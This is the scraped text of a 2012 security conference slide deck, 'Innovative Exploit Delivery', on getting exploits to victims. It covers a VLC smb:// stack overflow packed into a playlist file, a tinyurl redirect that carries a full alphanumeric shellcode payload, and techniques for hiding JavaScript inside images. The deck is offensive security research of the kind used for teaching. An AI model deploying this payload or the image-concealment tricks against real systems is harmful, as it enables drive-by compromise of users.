INNOVATIVE EXPLOIT DELIVERY                      SAUMIL SHAHnet-square            HITB2012KUL
# who am iSaumil Shah, CEO Net-Square.• Hacker, Speaker, Trainer,  Author - 15 yrs in Infosec.• M.S. Computer Science     ...
My area of work   Penetration       Reverse      Exploit     Testing       Engineering    Writing        New         Offen...
When two forces combine...       Web               Binary      Hacking           Exploitsnet-square
SNEAKY             LETHALnet-square
net-square
302        IMG   JS   HTML5net-square
net-square
VLC smb overflow• smb://example.com@0.0.0.0/foo/#{AAAA  AAAA....}• Classic Stack Overflow.net-square
VLC XSPF file<?xml version="1.0" encoding="UTF-8"?><playlist version="1"   xmlns="http://xspf.org/ns/0/"   xmlns:vlc="http...
Alpha    Encoded               Tiny   ZOMFG     Exploit   URLnet-square
100% Pure             Alphanum!net-square
VLC smb overflow - HTMLized!!<embed type="application/x-vlc-plugin"     width="320" height="200"     target="http://tinyur...
301 Redirect from tinyurlHTTP/1.1 301 Moved PermanentlyX-Powered-By: PHP/5.2.12Location:smb://example.com@0.0.0.0/foo/#{AA...
net-square
Exploits as Images - 1• Grayscale encoding (0-255).• 1 pixel = 1 character.• Perfectly valid image.• Decode and Execute!ne...
net-square
Im an evil Javascript             Im an innocent imagenet-square
<CANVAS>net-square
net-square             c) no eval()
Same Same No Different!                var a = eval(str);      a = (new Function(str))();net-square
d) IMAJSnet-square
IMAJS       Seeing is Believingnet-square
Browser Support for IMAJS-GIFHeight       Width   Browser/Viewer    Image      Javascript                                 ...
Browser Support for IMAJS-BMPHeight       Width   Browser/Viewer    Image      Javascript                                 ...
e)   The    αq  exploitnet-square
Encode using Alpha channelnet-square
Demo   IMAJS     αq     FTW!net-square
f) ONE LAST DEMO!!! net-square
The FUTURE?         HTML5 Video         SVG         WebGL         Mobile Browsersnet-square
KTHXBAI    See you in 2013??net-square          saumil@net-square.com | @therealsaumil
Upcoming SlideShare
Loading in …5
×

Innovative Exploit Delivery

3,253 views

Published on

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Published in: Technology
1 Comment
2 Likes
Statistics
Notes
  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
3,253
On SlideShare
0
From Embeds
0
Number of Embeds
86
Actions
Shares
0
Downloads
0
Comments
1
Likes
2
Embeds 0
No embeds

No notes for slide

Innovative Exploit Delivery

  1. 1. INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAHnet-square HITB2012KUL
  2. 2. # who am iSaumil Shah, CEO Net-Square.• Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.• M.S. Computer Science Purdue University.• saumil@net-square.com• LinkedIn: saumilshah• Twitter: @therealsaumilnet-square
  3. 3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open"net-square
  4. 4. When two forces combine... Web Binary Hacking Exploitsnet-square
  5. 5. SNEAKY LETHALnet-square
  6. 6. net-square
  7. 7. 302 IMG JS HTML5net-square
  8. 8. net-square
  9. 9. VLC smb overflow• smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}• Classic Stack Overflow.net-square
  10. 10. VLC XSPF file<?xml version="1.0" encoding="UTF-8"?><playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList></playlist> net-square
  11. 11. Alpha Encoded Tiny ZOMFG Exploit URLnet-square
  12. 12. 100% Pure Alphanum!net-square
  13. 13. VLC smb overflow - HTMLized!!<embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
  14. 14. 301 Redirect from tinyurlHTTP/1.1 301 Moved PermanentlyX-Powered-By: PHP/5.2.12Location:smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA}Content-type: text/htmlContent-Length: 0Connection: closeServer: TinyURL/1.6 net-square
  15. 15. net-square
  16. 16. Exploits as Images - 1• Grayscale encoding (0-255).• 1 pixel = 1 character.• Perfectly valid image.• Decode and Execute!net-square
  17. 17. net-square
  18. 18. Im an evil Javascript Im an innocent imagenet-square
  19. 19. <CANVAS>net-square
  20. 20. net-square c) no eval()
  21. 21. Same Same No Different! var a = eval(str); a = (new Function(str))();net-square
  22. 22. d) IMAJSnet-square
  23. 23. IMAJS Seeing is Believingnet-square
  24. 24. Browser Support for IMAJS-GIFHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -net-square
  25. 25. Browser Support for IMAJS-BMPHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -net-square
  26. 26. e) The αq exploitnet-square
  27. 27. Encode using Alpha channelnet-square
  28. 28. Demo IMAJS αq FTW!net-square
  29. 29. f) ONE LAST DEMO!!! net-square
  30. 30. The FUTURE? HTML5 Video SVG WebGL Mobile Browsersnet-square
  31. 31. KTHXBAI See you in 2013??net-square saumil@net-square.com | @therealsaumil

×